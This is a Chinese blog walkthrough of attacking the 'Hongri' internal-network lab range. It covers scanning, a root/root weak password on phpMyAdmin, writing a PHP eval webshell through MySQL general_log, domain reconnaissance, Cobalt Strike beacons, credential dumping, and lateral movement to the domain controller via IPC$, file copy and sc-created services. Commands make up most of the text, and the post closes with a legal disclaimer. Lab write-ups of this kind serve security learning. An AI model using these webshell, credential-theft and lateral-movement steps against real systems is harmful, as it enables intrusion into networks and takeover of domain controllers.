红日内网靶场1渗透笔记

靶场部署:

https://blog.csdn.net/miaositekali/article/details/160932582

靶场部署完成后:

1.启动phpstudy

2.开启服务器防火墙 模拟真实场景

按照内网渗透的思路走

先获取立足点->内网信息搜集->权限提示->横向移动->目标达成权限维持->清除痕迹

获取初始立足点

就是公网上的渗透打点

对web服务器上的服务进行渗透

大概的流程如下:公网信息收集->漏洞挖掘->漏洞利用->getshell拿下服务器权限

信息搜集:

1.namp扫描对应的web服务器

目标服务器有开80和3306的端口

真实场景中的3306端口一般是不对外映射的

2.访问80端口的web服务

3.dirsearch扫描网站目录

复制代码
python dirsearch.py -u http://192.168.1.6

记得要用python的虚拟环境

扫出来了phpinfo和phpMyadmin路径

访问

漏洞挖掘:

可以手动去对这些个页面进行漏洞的挖掘

但是我们发现了这个phpmyadmin的页面 这是个管理mysql的页面 有很多已经爆出来的漏洞

我们还通过路径扫描知道了当前phpmyadmin的漏洞

可以去查找当前版本有无一些已经公开的漏洞 这是最快的方式

漏洞利用

1.针对phpmyadmin有专门的漏洞利用工具

https://github.com/mRJ0hN1/phpMyAdminHacker

bash 复制代码
python phpMyAdminHacker.py -u http://192.168.1.6/phpMyAdmin/ -d password.txt

2.通过弱口令root/root进入后台

3.利⽤⽇志getshell

(1)查看当前日志配置

bash 复制代码
show variables like '%general_log%'

(2)开启日志

bash 复制代码
set global general_log = 'on'

(3)设置日志路径C:\phpStudy\WWW

因为我们要确保写入的webshell我们可以访问到,所以得知道电脑启动的web目录的绝对路径

bash 复制代码
set global general_log_file = "C:/phpStudy/WWW/shell.php" 

接下来我们执行的sql语句就会被记录到shell.php文件中

(4)我们执行以下sql语句

bash 复制代码
select '<?php eval($_POST["pipi"])?>';

getshell获取初始点

1.蚁剑连接webshell

2.查看当前权限

发现已经是管理员用户了 提权都省了 直接进入内网信息搜集

内网信息收集

1.获取当前控制主机的信息 ip 补丁等信息

2.获取内网的信息 是否域环境 都有哪些ip存活 存活主机上有起什么服务 形成一个拓扑

3.获取 凭据和账号密码

主要就是执行一些命令

bash 复制代码
systeminfo 查看主机补丁和域名信息

hostname 查看主机名

whoami  查看当前是什么用户

查看域内有多少用户
net user /domain

查看域内的主机名
net group "domain computers" /domain


查域控ip和域名
nslookup -type=SRV _ldap._tcp

查看当前服务器ip地址
ipconfig

查看当前网段都有哪些电脑存活
arp -a

1.确认是否为域环境

查看主机名

当前用户为

那这大概率就是域环境了 本地账号格式:机器名\账户名 域账号格式:域名\账户名

如果是本地账号的话 那就是stu1\administrator了

2.搜集域信息

域名为god.org 还看到了打的一些补丁信息

查看域内有多少用户 五个用户 administrator是其中之一

查看域内的主机名

STU1就是我们现在拿到webshell的服务器

ping一下全域名 确认主机是否存活

只要加入了域 即便开了防火墙 ping也是能ping通的

这俩服务器的全域名为:

bash 复制代码
DEV1.god.org
ROOT-TVI862UBEH.god.org

或者也可以用arp协议 查看当前网段还有哪些主机存活

192.168.52.138 和192.168.52.141都存活

我们拿下的这台webshell服务器地址为 192.168.52.143

3.重点是看下域控的ip和域名

bash 复制代码
查域控ip和域名
nslookup -type=SRV _ldap._tcp

域控ip地址为192.168.52.138 域控的全域名为owa.god.org

在这儿还有个小技巧就是 在域环境中 dns服务器地址一般就是域控的地址

执行 ipconfig /all 查看

确实是192.168.52.138

到这儿我们知道了

1.当前服务器ip 版本补丁 x64位系统

2.处在域环境中 域名为god.org 域内还有192.168.52.138 和192.168.52.141服务器 其中192.168.52.138为域控 域名owa.god.org

3.当前拿到了域账号管理员的权限 god\administrator 可以用minikaze解密账号密码

内网的一些基本信息差不多就都清楚了 已经有一个初步的网络拓扑了 可以进行下面的操作

实战中我们肯定是要去翻一下代码 找到数据库账号密码啥的 连接数据库的

既然是域环境 那么我们横向移动的目的肯定就是拿下域控啦

CS上线web服务器

1.cs设置监听器

2.生成木马

关联我们刚刚新建的监听器

保存exe文件

3.通过webshell上传到web服务器上

运行1111.exe上线cs

4.点击beancon,鼠标右键,选择会话交互,进入命令交互界面

sleep 3 全部命令3秒执行(默认时60秒太长,)

执行系统命令要在命令前加个shell

5.点击beacon 右键 ->凭据提取->抓取明文密码

CS上线域控

上线域控就比较麻烦了 因为域控主机与攻击主机网络不通

需要web服务器在中间转发数据 做跳板

1.IPC横向移动(命名管道) 先在web服务器和域控之间建立IPC连接

bash 复制代码
net use \\192.168.52.138\ipc$ "Aa123456" /user:god\administrator

记得命令前加shell

bash 复制代码
查看ipc连接
net use

2.新建一个SMB Beacon监听器和木马 在服务器和域控之间建立SMB流量隧道

木马生成选择windows程序stageless的

关联监听器

将smb.exe木马上传到web服务器

3.利用IPC管道将木马文件远程复制到域控c盘根目录

bash 复制代码
copy smb.exe \\192.168.52.138\C$

4.通过IPC管道 通过web服务器向域控添加一个服务 服务的内容就是运行c盘下的木马

bash 复制代码
#创建服务运行木马
sc \\owa.god.org create test binpath= "cmd.exe /c c:\smb.exe"

开启这个test服务

bash 复制代码
#开启服务
sc \\owa.god.org start test

要快点执行下一步 不然会提示没有及时响应啥的

5.父进程web服务器连接子进程域控

bash 复制代码
link owa.god.org

域控192.168.52.138已上线cs

执行一些命令

到这儿其实就已经达到了目的了

剩下的就是痕迹清理了

【重要声明】

本文内容仅用于技术交流与学习,严禁用于任何非法用途。所有操作必须严格遵守《中华人民共和国网络安全法》及相关法律法规,仅在获得明确授权的前提下进行。读者应自行承担操作风险,作者不对任何违规使用或由此引发的法律后果负责。

相关推荐
一只机电自动化菜鸟1 小时前
一建机电备考笔记(34)焊接技术(设备与材料1)(含考频+题型)
笔记·学习·职场和发展·生活·学习方法
chushiyunen1 小时前
知识图谱笔记
人工智能·笔记·知识图谱
今儿敲了吗1 小时前
面向对象(二)——UML基础
笔记·uml
程序员JerrySUN1 小时前
Jetson边缘嵌入式实战课程第三讲:L4T 与 Jetson 系统架构
linux·服务器·人工智能·安全·unity·系统架构·游戏引擎
sheeta19981 小时前
Vue 前端基础笔记
前端·vue.js·笔记
哆哆啦001 小时前
obsidian远程同步方案:infiniCloud+remotely save方案
笔记·git·obsidian
咸鱼翻身小阿橙2 小时前
Qt Quick 登录界面代码学习笔记
笔记·qt·学习
智慧医养结合软件开源2 小时前
规范新增管控,凝聚志愿力量赋能康养服务
大数据·安全·百度·微信·云计算
Brilliantwxx2 小时前
【C++】priority_queue以及 仿函数 的学习
开发语言·c++·笔记·学习·算法